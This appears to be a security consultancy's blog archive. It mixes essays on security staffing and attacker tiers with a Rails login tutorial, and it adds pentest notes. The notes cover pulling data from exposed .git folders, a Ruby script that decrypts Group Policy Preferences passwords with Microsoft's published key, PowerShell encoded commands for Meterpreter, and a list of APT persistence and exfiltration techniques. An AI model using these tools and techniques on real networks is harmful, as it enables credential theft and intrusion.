We also offer private trainings of our classes and have the capability to offer classes almost anywhere. If you are interested or have questions email us at training@attackresearch.com

People tend to focus on various areas as being important for computer security such as memory corruption vulnerabilities, malware, anomaly detection, etc. However the lurking and most critical issue in my opinion is staffing. The truth is, there is no pool of candidates out there to draw from at a certain level in computer security. As an example, we do a lot of consulting, especially in the area of incident response, for oil & gas, avionics, finance, etc. When we go on site we find that we have to have the following skills:

1. Soft skills (often the most important). The ability to talk to customers, dress appropriately, give presentations or speak publicly, assess the customer's staff, culture, and politics, and determine the real goals. I can't stress enough how important this is. It's not the 90s anymore; showing up with a blue mohawk, a spike in the forehead, and leather pants, not being a team player, cussing, and surfing porn on the customer's systems doesn't cut it, no matter how good you are technically. If you are that guy, then you get to stay in the lab, and I guarantee you will make far less money, even if you can write ASLR bypass exploits and kernel rootkits.

2. Documentation. This ties with the above for number 1. If you didn't document it, you didn't do it. I don't care how awesome an 0day you discovered, or what race condition in the kernel you found. If you can't clearly document it, the customer doesn't care and sees no value in what you did. The documentation has to be clean, clear, and laid out so that an executive can understand it, and so that the other security firm the customer hires to validate your results doesn't make fun of you.

4. Reverse engineering. This means disassembling binaries in IDA; running binaries in a debugger such as OllyDbg, WinDbg, or IDA; memory forensics; and especially de-obfuscation. Can you unpack a binary? How about if the packer is multi-stage and does memory page checksumming? What if the packer carries its own virtual machine? Do you know what breakpoints to set, when to change the Z flag, or how to hot patch a binary in memory?

5. Understanding programming. To be good at this stuff you need to know C, C++, .NET, VB, HTML, ASP, PHP, x86 assembly, and another dozen languages, at least well enough to look up APIs, understand standard libraries, and discover which imports are important.

6. Operating systems. You should know the ins and outs, including file systems, memory management, the kernel, library systems, and key command line tools, of at least half a dozen OSes, especially as they are used in enterprise environments: domains, NFS, NIS, Kerberos, LDAP. So not only Windows, Linux, and OS X, but also Solaris, AIX, and some embedded or mobile systems.

7. Exploit development. Often on engagements you run across an exploit or even an 0day that you must reverse engineer, replicate safely, and test in the customer's particular environment. You have to be able to take it apart, analyse the shellcode, understand everything it's doing, and re-write your own version of it.

8. Versatility with a wide variety of tools, many of which are not easy to access outside of the enterprise. At a minimum, you need enough technical base knowledge to use whatever tool is put in front of you. Examples include Wireshark, Splunk, FireEye, NetWitness, ArcSight, TippingPoint, Snort/Sourcefire, Blue Coat, Websense, TMI, and EnCase.

All of the members of your team, whether you are a consulting shop or an internal incident response team, need to be able to do these things and overlap with each other. Some can be stronger in RE than network forensics, but everyone has to be able to do all of it to some extent, especially 1 and 2.

The problem with this? These people don't exist; they are unicorns. Those who can do this are either already employed, well paid, and tackling more interesting problems than you can offer, or they are running, or are partners in, their own company that you could (and should) outsource to. </shameless self promotion>. But even small boutiques that can do the above are rare, heavily booked, and charging close to high-powered-lawyer hourly rates. (When people question rates, I point out that big name IR shops are around $400/hr and even the Best Buy Geek Squad charges $120/hr to reload your OS.)

A lot of big contractors are trying to approach security like they did IT in the 90s and 00s: bid low, win a huge contract, then put out job ads for anyone who knows how to use a computer. The problem is, while you can come up to speed for a help desk or to admin a Windows server relatively quickly, the above list of skills takes a decade or more to master. So big contractors are failing, badly, and trying to buy up the small guys. But there is another problem there as well.

People who are able to do the above 1.) value freedom highly and don't want to work 9 to 5 in a cube farm, and 2.) don't want to live or work for long periods of time onsite where you are. They don't want to live in Houston or Cleveland or Indianapolis, or probably even in the DC area. They want to live in La Jolla and San Francisco and New York, and someone, somewhere is willing to pay them a lot to do it, and probably to do it remotely most of the time, so you are going to lose there.

In response, many companies try to follow the old plan of recruiting at colleges. In a lot of cases these students come out knowing some Office and probably some Java, and that's about it. You might luck out and get a good RIT, Georgia Tech, or New Mexico Tech student who knows more, but most likely those have already been recruited by the government or somewhere else. And the learning curve is long enough that by the time they are really good, they have already moved on. This kind of work is PRIME for remote. Let people come in for a week every other month. If you require internal security people to be on site all the time in some crappy city, you will fail.

On the security company side you have the same problem: no one to hire. So many security companies, in order to grow (because the way you make money in services is via higher staffing levels), hire whatever they can find and field them. This continues the trend of mediocre security, companies getting owned, PCI, etc. Boutiques cannot grow to the size necessary to win the bigger contracts because there is no one to hire.

The solution many companies have been trying is to focus on buying appliances, contracting pro services to set them up, and hoping that automation can solve the problem. It cannot. Here is a perfect example: a customer has a box that detects malware in email attachments. It flagged a PDF as highly malicious. We decided to check it out, and at first glance it looked very bad. It had all the classic signs of an exploit, heap spray, etc. You couldn't tell the difference between it and another verified malicious PDF. However, upon further inspection we discovered that a popular AutoCAD-type program generated legitimate PDFs that looked this way. This is something that is not automatable. You must have an experienced and skilled analyst to do this. No amount of rack-mount, fancy-logo appliances will help you. And the bigger your enterprise, the more you need. Every enterprise block of 30-50k IPs needs a team of 5-10 people.

Which leads me to the next issue: how you perceive your staffing resources. Example: one company I saw said they had a staff of 12 analysts to deal with security detection and response. I thought, wow, pretty good! Let's break the team down:

A manager, full time in meetings, paperwork, etc.

An assistant to the manager, secretarial work, etc.

3 senior advisers, i.e. guys about to retire, smart guys who give great advice and hold institutional knowledge, but not analysts

5 people involved in tool testing, stand up and maintenance (all those boxes I mentioned before). Great guys, not analysts or really involved in analysis

1 Developer mostly focused on designing queries and interfaces for the tools.

1 Actual analyst.

While management believes they have 12 people and doesn't understand why things take so long they actually have 1 person. This situation is very common in big companies. 1 good analyst for an enterprise is not NEARLY enough. And you can't be reliant on a specific person unless you want to set yourself up for a disaster (while at the same time you must cultivate and care for those star players).

That's my case for why staffing is the most important issue we face in computer security. What is the solution? Some would say training, but let's be honest, were you back home writing rootkits for work after taking Hoglund and Butler's class at Blackhat? Probably not. Have you found piles of valuable 0day after completing Halvar's most excellent course in Vegas? I doubt it. A 2-day to 1-week course isn't doing it. Going through the entire SANS curriculum isn't doing it, and CISSP sure as hell isn't doing it.

You have to spend around 6hrs a day, after work, highly focused on coding, reversing, etc. for a minimum of 2 years to be decent. That is how the adversary does it. That's how the big name researchers and the best staff do it, and unfortunately it only takes a couple of attackers for every 10 defenders out there.

In this portion of the series, we will create the foundation for a login page and deal a little bit more with the Model portion of MVC.

We need to be able to assign the following information to a user.

First Name

Last Name

Email Address

Password

Admin (true/false)

This is where the Model comes in. Before we jump into that, let's create a Users controller similar to the way we created a Home controller in the last post.

Note that the "new" following Users simply states that a "new" action (method) will be automatically defined in the controller for you.

Also, we should briefly cover how you connect to a database with Rails. In this tutorial, we will stick with the default configuration/database, SQLite. Navigate to config/database.yml:

If you remember Part 2 of the series, we covered the 3 default modes of Rails. This is the reason there are 3 different database configurations in this file. It is useful as your local development environment database will differ from Production (ex: database username, password, and host would/should be different).

When we are running in development mode, the database we will be using will be db/development.sqlite3 as specified on line 8. The naming convention refers to its location and filename.

So nothing really to change there, let's go ahead and create the model.

Command(s) Breakdown:

rails - Invoking a Rails command

g - Short for generate, used to generate Rails items

model - specifies that we are generating a model

Users - the name of the model, which actually refers to both the model (app/models/users.rb) and a table in the database

first_name:string (etc.) - The first portion is the name of the column in the table and the second part (string) identifies the variable type to be stored in the database.

Now, upon generation, the model is created but the db table/columns do not yet exist. To make this happen, let's run rake db:migrate.

To give you a visual of what was just created...

Note the table "users" has been created along with the columns we identified during model creation.

This is great and later if you'd like to add an additional column to your local db, you can. What if you'd like to add a column so that the next person to download your code and run rake db:migrate also has the new column? Navigate to db/migrate/ and you'll see a file that ends in _create_users.rb. This is where you would make that change. Do NOT edit the db/schema.rb file for that purpose (this is overwritten by the migrate files).
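For reference, the generated db/migrate/*_create_users.rb looks roughly like this; a reconstruction from the columns above using Rails 3-era syntax, not the exact file:

```ruby
class CreateUsers < ActiveRecord::Migration
  def change
    create_table :users do |t|
      t.string :first_name
      t.string :last_name
      t.string :email
      t.string :password
      t.boolean :admin

      t.timestamps
    end
  end
end
```

Adding a column for the next person would mean adding another `t.string`/`t.boolean` line here (or, more conventionally, a new add_column migration) rather than touching schema.rb.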

Next, create a sessions controller:

Time to add code to the session controller (app/controllers/sessions_controller.rb).

Notice the new and create actions. The gist of this, AFAIK, is that Rails uses new to instantiate a new instance of the Model object and create will actually save data and perform some of the more permanent actions. For our purposes, the "GET" request to the sessions#new and the new.html.erb file will show a login form. Once 'POST'-ing from that login form, the create method will receive the email and password parameters.

Code Breakdown:

Line 6 - Calls a method in the User model (authenticate).
Line 8 - Stores the user's ID in the user's session.
Line 9 - Redirects to the home path once authenticated.
Line 11 - A user did not authenticate correctly and we want to send them back to the login page.
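The controller that breakdown refers to, following the Railscast this series draws from, looks roughly like this. A sketch: home_path and login_path are assumed route helpers, and it cannot run outside a Rails app:

```ruby
# app/controllers/sessions_controller.rb
class SessionsController < ApplicationController
  def new
    # renders app/views/sessions/new.html.erb (the login form)
  end

  def create
    user = User.authenticate(params[:email], params[:password])  # line 6
    if user
      session[:user_id] = user.id                                # line 8
      redirect_to home_path                                      # line 9
    else
      redirect_to login_path                                     # line 11
    end
  end

  def destroy
    session[:user_id] = nil
    redirect_to root_path
  end
end
```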

The next thing we need to discuss are the changes to your routes.rb file:

Line 3 - The first portion (ex: logout) identifies a request for that resource, which goes to sessions#destroy.
Line 8 - Our root has changed to the login page (app/views/sessions/new.html.erb).
Lines 10-12 - We've identified resources (controllers) and instantiated some default routes. 7 to be exact:

Note that those 7 routes were not manually defined by you in your routes file; rather, Rails created them for you. This is because you specified `resources :<controller name>` in your routes.rb file. You can create views and controller actions whose names match those 7 defined routes (index, create, etc.). They automagically have routes!
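Reconstructed from the breakdown above, routes.rb looks something like this (a sketch; line positions approximate):

```ruby
Attackresearch::Application.routes.draw do

  match "logout" => "sessions#destroy"

  root :to => "sessions#new"

  resources :users
  resources :sessions
end
```

The 7 actions those default resource routes map to are index, show, new, create, edit, update, and destroy.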

Code breakdown:

Line 5 - form_tag is a Rails method; notice how we encapsulate it in <%= %>. This is how we separate Rails code from regular HTML. You may also see <% %>.
Lines 7, 8, 11, 12 - Rails methods that are converted by Rails into labels and input fields.
Line 14 - submit_tag, again, a Rails method. Note the {:class => "btn btn-primary"}. This is a Twitter-Bootstrap definition you can find here.
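The login form itself (app/views/sessions/new.html.erb) would look roughly like this; a sketch built from the helpers named in the breakdown, with line positions approximate:

```erb
<h1>Log in</h1>

<%= form_tag sessions_path do %>
  <div class="field">
    <%= label_tag :email %>
    <%= text_field_tag :email %>
  </div>
  <div class="field">
    <%= label_tag :password %>
    <%= password_field_tag :password %>
  </div>
  <%= submit_tag "Log in", {:class => "btn btn-primary"} %>
<% end %>
```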

Now fire up your instance, you should see the following:

Note: You can't necessarily use this yet but it looks nice :-)

This was a lot of information (read: lengthy post) and while the login does not yet work, we will wrap all of this up in Part 5 of the series. While part 5 of this series will walk you through the details of the code, you can always skip ahead and grab it from this Railscast (if you'd like to finish up).

Worth a read if you haven't. Unfortunately, the key to his post relied on wget and directory listings, making it possible to download everything in the /.git/* folders.

Unfortunately(?) I don't run into this too often. What I do see is the presence of the /.git/ folder, sometimes the config or index files there, but certainly no way to know what's in the object folders (where the good stuff lives) [or so I thought].

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'site_wordpress');
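As it turns out, the object folders aren't opaque at all: a loose git object is just zlib-deflated data with a small header in front. A quick Ruby sketch (read_git_object is a name I made up) shows how little it takes to read one:

```ruby
require "zlib"

# A loose object under .git/objects/ab/cdef... is just zlib-deflated
# data of the form "<type> <size>\0<content>".
def read_git_object(path)
  raw = Zlib::Inflate.inflate(File.binread(path))
  header, content = raw.split("\0", 2)
  type, size = header.split(" ")
  { :type => type, :size => size.to_i, :content => content }
end
```

Walk the objects directory, inflate everything, and blobs like wp-config.php fall right out.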

I did a talk at the Oct 2012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this extremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wn everything :-)

I ended up writing some ruby to do it (the blog post has some python) because the Metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. Now you can do it yourself:
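The decode itself is tiny. Here's a self-contained Ruby sketch along the lines of what that script does (decrypt_cpassword is an illustrative name; the AES key is the one Microsoft published on MSDN):

```ruby
require "openssl"
require "base64"

# The AES-256 key Microsoft published on MSDN for GPP cpassword values.
# It is the same on every domain, which is the whole problem.
GPP_AES_KEY = ["4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"].pack("H*")

def decrypt_cpassword(cpassword)
  # GPP strips the Base64 padding; restore it before decoding
  padded = cpassword + "=" * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new("AES-256-CBC")
  cipher.decrypt
  cipher.key = GPP_AES_KEY
  cipher.iv = "\x00" * 16
  plain = cipher.update(Base64.decode64(padded)) + cipher.final
  plain.force_encoding("UTF-16LE").encode("UTF-8")  # passwords are stored UTF-16LE
end
```

Feed it the cpassword attribute out of Groups.xml and the local admin password pops out.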

I needed to make a map of the access points for a client. Since I can't show that map, I made another using the same technique.

First, take your handy dandy Android device and install Wigle Wifi Wardriving. It uses the internal GPS and wifi to log access points, their security level, and their GPS position. Looks like this (yup, I stole these): a list of access points, and it also makes a cute map on your phone.

Once you have the APs you can export the "run" from the data section. Yes yes, the stolen photo says "settings" but if you install it today it will say "data" there now.

With the KML export you can import that directly into Google Earth and make all sorts of neat maps by toggling the data: all access points, open access points, WEP encrypted access points.

That's it.

-CG

If you've been following along in this series you've already created a Rails application called "attackresearch", configured your Ruby/gem environment with RVM, and created a Rake task to start the application with Unicorn.

In this portion, we will create our first Rails page and configure the appropriate routes.

Now, first thing first, remove the index.html file located under the public directory:

Removing this file removes the new Rails application landing page, as it is unnecessary.

Fire up the server using the rake task created earlier in this series and browse to the site.

Uh-oh! Why did this occur? Rails requires some direction from you, the developer: where does the default or "root" page live, and how do I get there?

Like any good map, you need to show a route. That being said, open config/routes.rb and take a look at what I mean:

Notice the comments? Each comment block provides instructions on mapping routes in various ways. You can delete them :-). Leave the first and last lines (actual code) but remove the comments.

Now that we know where to map out the route to our destination, let's create a destination. The first thing we want to do is go to our terminal and enter the following (this only has to be done once):

Remember the twitter-bootstrap-rails gem we added in the first part of this series? We just installed it. This allows us to forego some CSS and HTML work and piggyback off those of the Twitter designers (thanks gals/guys).

Next, we will generate our first controller and view. As of right now, we don't necessarily require a model. First, here is a quick break down of MVC:

Model - Used for handling data resources (databases, usually).

View - Renders HTML content to users.

Controller - Code that handles the bulk of the logic and decision making.

Generating a "Home" controller:

We used --skip-stylesheets as they are unnecessary when using twitter-bootstrap

Note that a new *View* folder was created at app/views/home, along with a controller file, app/controllers/home_controller.rb.

One thing to be aware of. The name of your controller will have `_controller.rb` appended to it. This is the standard convention.

Time to make an entry in routes.rb. The first thing we need to define is a landing page so that if you request our URL, you have a starting page. We will call it "welcome". There are a few things that have to happen:

Make an action inside the home controller called "welcome".

Create a view page under the /app/views/home folder called "welcome.html.erb".

Configure the route. Since this is our first, we will simply use `root :to => "<controller>#<action>"`.

Note: Rails does not require code within the action (method), only that it exists.

Note: Only one root route can exist.
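Put together, those three steps amount to something like this (a sketch; it only runs inside the Rails app):

```ruby
# app/controllers/home_controller.rb
class HomeController < ApplicationController
  def welcome
    # Rails only needs the action to exist; no code required yet
  end
end

# config/routes.rb
# root :to => "home#welcome"
```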

Time to edit the welcome.html.erb...

Note that the h1 tag has a look and feel defined by the h1 definition in Twitter's CSS.

Welcome Page

..And with that we have a website, sort of. To recap, we covered generating a controller, making a view page, and adding the action within the home controller called "welcome".

The last thing I'll cover before the next tutorial is the flow of a request. So when you request http://localhost/, this is what is happening.

The config/routes.rb file is checked to see where this request should go.

Since the request is for the root page '/', it is rerouted to the Home controller and Welcome action.

Immediately following any code executing in the Welcome action (none right now), the request finally lands on the view page, the last part of its journey: welcome.html.erb.

Again, the flow is route -> controller -> view.

If you want to see what I mean, we can stop the flow from reaching the view stage by (welcome.html.erb) by rendering content at the controller. Observe:
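A minimal version of that controller-side render would look like this (a sketch using the Rails 3-era :text option; newer Rails calls it :plain):

```ruby
# app/controllers/home_controller.rb
class HomeController < ApplicationController
  def welcome
    # Responding here stops the flow before welcome.html.erb renders
    render :text => "Hello straight from the controller"
  end
end
```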

In the last post, Basics of Rails Part 1, we created and ran the Rails application "attackresearch". Next, we will change the Web Server to Unicorn as well as introduce the concept of Rake.

Something to note, Rails typically is run in three modes:

Test - Mode typically used for Unit Tests.

Development - Development environment, includes verbose errors and stack traces.

Production - Settings are as if you were running in this application in a production environment.

The default mode when running Rails locally on your machine is development mode. Also, any command you enter will be run in the context of development mode. This means both Rake tasks and Rails commands alike, and it also holds true for the Rails console, which can be your best friend.

Now obviously, if you've done something custom like `export RAILS_ENV=production` this would be different. Additionally, explicitly setting the mode in which something like the Rails console runs (example: rails console production) will change the default behavior.

What does all this mean? Well, really it means that you want to develop in development mode and run a production application in production mode. Pretty simple huh?

Time to configure for Unicorn versus the default Webrick web server. If you are asking yourself "why", the answer is fairly straightforward. Unicorn is meant for production and handles a large amount of requests better and overall, is more configurable. For the purposes of this tutorial, we will use Unicorn for both development and production.

I want to demonstrate two ways of doing this. The first is by using a startup shell script. The other, for the purposes of an introduction to Rake tasks, will be to actually create a Rake task to start the application in lieu of a shell script.

Startup shell file:

Modify your Gemfile by uncommenting the line with the Unicorn gem. Also, while we are at it, let's uncomment the Bcrypt gem as well:

Run `bundle install`:

Make the startup script executable and fire it up:

The line `rvmsudo bundle exec unicorn $*` means...

rvmsudo - Allows you to run sudo commands while maintaining your RVM environment.

bundle exec - Directs bundler to execute the program, automatically 'require'-ing all the gems in your Gemfile.

unicorn - Unicorn service.

$* - Any arguments passed to the script will be executed as part of the command inside of the script. Example: ./start.sh -p 4444 translates to - `rvmsudo bundle exec unicorn -p 4444` and would start the server on port 4444.
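Assembled from the pieces above, the whole start.sh is just a couple of lines:

```shell
#!/bin/bash
# start.sh - start Unicorn inside the RVM environment;
# any arguments (e.g. -p 4444) are passed straight through via $*
rvmsudo bundle exec unicorn $*
```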

Alternatively, we can just as easily package this up as a Rake task. A Rake task is a repeatable task that can be executed using the `rake` command. Nothing magical, it just harnesses Ruby goodness to convert your task definitions into an executable command. There is an excellent tutorial on Rake available via the Railscasts site.

For our purposes, let's create a Unicorn rake file. Do this under /lib/tasks and use the `.rake` extension. Presumably, you may wish to have multiple tasks available in the Unicorn namespace. For instance, if you'd like to both start and stop the Unicorn service, it would be beneficial to create a namespace titled "unicorn" with multiple tasks inside it. For the purposes of this tutorial, I will only cover building a start task, as you can easily expand upon this. Also, since we are running the Unicorn service in interactive mode, you can hit ctrl+c to stop it. I would like to note that having a start and stop task is very beneficial if you are running Unicorn detached (non-interactive), where the service runs in the background.

Moving along, here is the task...

Lines 1 & 9 - Begin and end the unicorn namespace definition.
Line 3 - Describe the task (useful at the console).
Line 4 - Define the task, with the first argument being the task name; any additional definitions (comma separated) are arguments. In this example, we accept a port argument.
Line 5 - We code some logic that says port_command will equal either an empty string or "-p <port number>"; if a port number is not provided (nil), it will equal an empty string.
Line 6 - This is a shell command that appends the result of port_command to `rvmsudo bundle exec unicorn`.

Let's list our tasks and see if it is available. Success! Notice how the description and command format are auto-magically taken care of for you. You can run this in one of two ways:

`rake unicorn:start[4444]` (starts the Unicorn service on port 4444)

OR...

`rake unicorn:start` (starts it on the default port, 8080)
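As a sketch, the rake file those line numbers describe looks like this. The first two lines here exist only so the sketch loads standalone; in lib/tasks/unicorn.rake you'd drop them, and the numbering in the breakdown then lines up with the namespace block:

```ruby
require "rake"
extend Rake::DSL  # only needed to load this sketch outside a Rakefile

namespace :unicorn do
  desc "Start the Unicorn web server, optionally on a given port"
  task :start, [:port] do |t, args|
    # "-p <port>" when a port was given, empty string otherwise
    port_command = args[:port].nil? ? "" : "-p #{args[:port]}"
    sh "rvmsudo bundle exec unicorn #{port_command}"
  end
end
```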

To recap, we've shifted off of Webrick and over to Unicorn. Also, we've introduced the concept of a Rake task.

Stay tuned for more parts in this series...

~cktricky

In this series, I would like to demonstrate some of the basics of building a Ruby on Rails application and how MVC (Model-View-Controller) works. We will discuss some of the security pitfalls as well. Firstly, we need to make sure the tech is understood.

That being said, in this first part of the series, let's discuss some general Ruby "stuff" that makes life a little bit easier when dealing with day to day Ruby tasks.

RVM, RVM Gemsets, and an RVM resource file.

On the surface, Ruby Version Manager (RVM) allows you to host multiple versions of Ruby on your system and easily switch between them. If you go a little deeper, you'll see that RVM also provides the ability to host multiple "Gemsets" within each version of Ruby. This means you can create a Gemset per application and never worry about conflicting dependency versions.

One last thing to mention, you can do all of this seamlessly leveraging an .rvmrc file. When you change into the application's folder that holds an .rvmrc file, you will automatically switch Ruby versions and gemset based off the values specified in the rvm resource file (.rvmrc).

Firstly, let's choose our Ruby version as well as the name of our Gemset. I'm going to choose Ruby Enterprise Edition (already installed via $ rvm install ree) and name my Gemset after the application, "attackresearch". Shown later.

Now let's install Rails and its required gems.

Let's create the Rails application!

Now let's get the Gemfile and .rvmrc in order. I'm going to add the 'twitter-bootstrap-rails' gem and then perform a "bundle install". Whenever a change is made to your Gems, run 'bundle install' again to update the Gemfile.lock file.

The reason for twitter bootstrap will become clear later in these tutorials. Essentially, it allows us to easily create the visual aspects of the application.

Now for the .rvmrc file
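The .rvmrc itself can be as simple as a single line (rvm can also generate a longer, checksummed version; this is the minimal form for the ree ruby and gemset chosen above):

```
rvm --create use ree@attackresearch
```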

Just to test that the .rvmrc file works, let's leave the directory then navigate back into it. Lastly, perform a 'gem list' to ensure our gems are available.

Part of it is the whole interactive shell-ness of powershell. So if you just type "powershell" once you drop to a cmd.exe, you won't ever get the powershell prompt.

In a similar vein, I've been unable to get any combination of execute -f powershell.exe -a "blah blah" to work either. If anyone has the magic syntax, I know lots of people who would be interested. (Actually, Carlos Perez hooked me up...answer below.)

So, you can run powershell scripts via .bat files, and those execute just fine from within cmd.exe, from the "execute" command, OR via the encoded command [command].

Generates it based on old PowerSploit code here. Also a note to mention that the 64-bit business I mentioned here still applies: if you are on x64 you need to call the PowerShell binary in SYSWOW64 to run 32-bit payloads.
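For reference, the encoded command is nothing exotic: PowerShell's -EncodedCommand just wants the script Base64-encoded from its UTF-16LE bytes. A quick Ruby sketch (the helper name is mine):

```ruby
require "base64"

# Build the blob for: powershell.exe -EncodedCommand <blob>
# PowerShell expects Base64 over the script's UTF-16LE bytes.
def encode_powershell_command(script)
  Base64.strict_encode64(script.encode("UTF-16LE").force_encoding("BINARY"))
end
```

For example, encode_powershell_command("dir") yields ZABpAHIA, so `powershell.exe -EncodedCommand ZABpAHIA` runs dir.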

I was reading an article recently about how some of the sterilization requirements in factory farms actually encourage more damaging infections which then led me to think about antibiotic resistant strains of diseases popping up due to overuse of antibiotics. This finally led me to think about similarities in computer security.

Since I started officially working in security around 1996, a number of us have suffered from a Cassandra complex: providing warnings and gloomy predictions, which have usually come true, and being generally ignored. Now, over a decade later, it's too late to do some of what we should have done back then. Everything is owned. We have to retrofit now instead of building security in from the ground up. It's MUCH more expensive and difficult today than if we had started then.

One of those predictions I was making back in the early 2000's was the following:

We should move away from standardized IT environments where everything is centralized and the same

We should stop trying so hard to stop the 80% of low sophistication attackers and focus on the 20% of attackers we really care about and who can really hurt us

Recently I have been doing a lot of incident response work and every organization I have dealt with is suffering from bullet number one. Everything centrally authenticates, everyone is running the same OS image, usernames are conventionalized and standardized, networks are flat, and everything is hacked. I consistently see an attacker take over an entire network because once they had 1 machine, they had them all. Does a scientist need the same environment as a secretary? Should the sales department's Windows desktop be able to touch the production SQL database? Don't know, don't care, everyone gets the standard image. (And the spread of an attack is massively higher.)

That the industry has tried hard to solve the low-hanging 80% of attacks is obvious from looking at the "solutions" that are provided, such as IDS, AV, firewalls, failure logging, scan-exploit-report penetration tests, etc. These have done a decent job of stopping scans, worms, and mass malware for the most part, and have failed miserably at stopping the remaining 20%. So why is this a problem? 80% is pretty good, right? Well, let's look at what the differences between the two types of attackers are:

80%

Goals

Might steal your SSN or CC

Might use your system as a bot in a DDOS

Might redirect you to advertisements

Might strip your WoW character

Might deface your website / embarrass you

Techniques

Mass scans

1day exploits (often available patch)

Exploiting poor web coding

SQLinjection

Mass malware

20%

Goals

Will try to steal your intellectual property and use it for strategic advantage

Will gather intelligence against you to gain an edge in negotiations, legislation, bids, etc.

Will destroy the master boot record of all your desktops to financially damage your country

Will use you to attack your customers to achieve the above

Will steal your source code to find 0day, insert backdoors or sell it to competitors

Techniques

0day

Targeted spear phishing

Sophisticated post exploitation & persistence

Covert channels

Anti-analysis & evasion

Malicious insiders, supply chain, implanted hardware

Mass data exfiltration

Crypto key stealing

Trust relationship hijacking

So what we have effectively done is build an environment where all target hosts are uniformly the same, and ensure that the only "germs" who can get in are the ones we can't detect, can't stop, and can't deal with. Superbugs. What's worse, the more we get compromised and hurt by the 20%, the more money and resources we throw at trying to solve the 80%, and the more we put our heads in the sand about the attackers that really want to hurt us and are good at doing it. We've pushed the motivated attackers away from using the easy-to-deal-with techniques toward the ones we can't solve very well and are very expensive.

There are a few possible solutions:

Build active response capabilities (offense). This is messy and will cause a lot of problems but no one ever won a war with high walls and defense only. (Maginot line?)

Start throwing money and resources at the 20% problem. PCI is not going to do it. Compliance pen tests are not going to do it. Researching virtualizing every process, location aware document formats, degradation of service for anomalous connections, better intelligence, data sharing and correlation, in short making it increasingly expensive for the sophisticated attacker is what we should be looking at.

We have to stop popping antibiotics and figure out how to cut out the flesh eating bacteria.

V.

Today I wanted to talk a bit more about APTSim. We all know by now that the bad guys always get in. Especially determined, well funded and well equipped attackers. We know roughly HOW they are getting in which is usually via a targeted Phish, SQLinjection, malicious URL, etc. Things that are hard to defend against because they depend on a human element or trust partnerships between organizations.

What we don't think about is the fact that our Incident Response and detection teams don't get exercised sufficiently (or ever) which makes them much less effective than they could be. We also don't think about modeling and understanding what real attack traffic looks like so we can tune our defenses against it. REAL traffic, not Nessus scans or CoreImpact exploits.

How can we know that our people and systems are actually able to detect the types of attacks we really care about if we don't know what each attack looks like in every data source we have? Is there a Windows event log entry reflecting a change in service permissions? Can the timing pattern in the call-home beacon be seen in net flow? What does an exfil file hidden in the recycle bin via user SID look like, and is it visible?

If you know all the malicious inputs to the system ahead of time, then you can determine all the data sources you have that show indicators that something has happened, rather than waiting until an attack happens to attempt to track it all back and hope for the best.

This subject is a bit more tricky, so let's approach it first with an example. Using HERMES, we analyzed some samples and activity from a group of APT actors that we call "UPS". The typical UPS attack performed the following activities (this information was compiled from IR activity and shared data from other victims):

Generate a particularly timed beacon that communicates over HTTP

Drop the command line Chinese language version of winrar on the target

Replace sticky keys with cmd.exe for persistence and access via RDP

Turn on RDP if it's not already enabled

Index and archive all office documents, compress and encrypt them with RAR and a specific password and store them in the recycle bin

Enable the support_388945a0 account and add it to the local admin group

Exfiltrate the data encoded over port 443 (but not SSL)

Setup an insecure service for persistence / privilege escalation

That is a fairly comprehensive list of attacker activity and each action generates either specific network traffic, log entries, and files on the target. So what we do with APTSim is to take all the above information and create a piece of pseudo-malware that takes the same actions, except in a safe and controlled manner, and includes cleanup components so it can be removed when the exercise is complete.
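Each of those actions leaves a checkable indicator. As one illustration, here is a defender-side sketch for the sticky keys swap (a hypothetical helper; on a real host you would point it at C:\Windows\System32\sethc.exe and cmd.exe):

```ruby
require "digest"

# If sethc.exe hashes identically to cmd.exe, sticky keys has been
# replaced and RDP-without-credentials is on the table.
def sethc_replaced?(sethc_path, cmd_path)
  Digest::SHA256.file(sethc_path).hexdigest ==
    Digest::SHA256.file(cmd_path).hexdigest
end
```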

Customers have different preferences as to how we take the next step but generally one of a few options is commonly used:

AR has VPN access to the customer network

AR has shipped a special box which the customer plugs into their network

AR conducts a physical penetration to launch the APTSim via a malicious USB key, custom developed Teensy, or other hardware implanted in customer equipment

AR generates a targeted phish mirroring the initial vector used by the original actors whether that's a malicious attachment or a URL, etc.

The customer executes the APTSim model themselves

The APTSim model then connects back to our command & control center, takes all the same actions as the real attacker, exfiltrates data, and then the customer is notified of what activity took place. The notification is a short document that contains log entry examples, PCAP examples, times and dates, ports used; in short, everything that is needed to detect the activity as well as track it back post-event.

If the attack simulation is not detected then AR will assist you in tuning your defenses whether that means new rules for your Cisco ASA's, custom ClamAV or Snort signatures, specialized Splunk apps, etc.

Rather than a barely useful once a year event, this process is ongoing, monthly or as new attacks are found and analyzed. When one of the organizations in your business sector is hit, within a very short period of time you know the crucial details of the attack, are tested to see if it could hit you as well, and finally are ready to defend before the attackers come for you. This is being proactive rather than reactive.

As a follow up to yesterday's post I would like to talk a bit more about HERMES and how it works.

INITIAL KNOWLEDGE - First, there is some form of information that comes in indicating a potential attack. This information usually has some trackable piece of information such as an email address, subject line, content, an md5 sum, etc. This information usually comes in via one of the following methods:

Law enforcement notification

Incident Response/forensics post compromise information

A detection system picks up an attack (rare)

Specialized sourcing (AR gathers targeted attack tools, malware and other indicators using a variety of means including IR and direct sharing)

What's special about the above is that HERMES uses your standard build image rather than a generic XP VM, the way maliciousness is determined, and some of the memory work we do. Also, the fact that the AV scans (unlike sites such as VirusTotal, Jotti, etc.) do not submit your sensitive samples to AV vendors is fairly unique.

CORRELATION - Most organizations track incidents over time via a notebook, a wiki, or most commonly a white board. HERMES allows you to identify relationships between attacks over time:

Incident Tracking

Analyst Notes

Actor/attribution Information

Relations between IOCs on different samples or cases

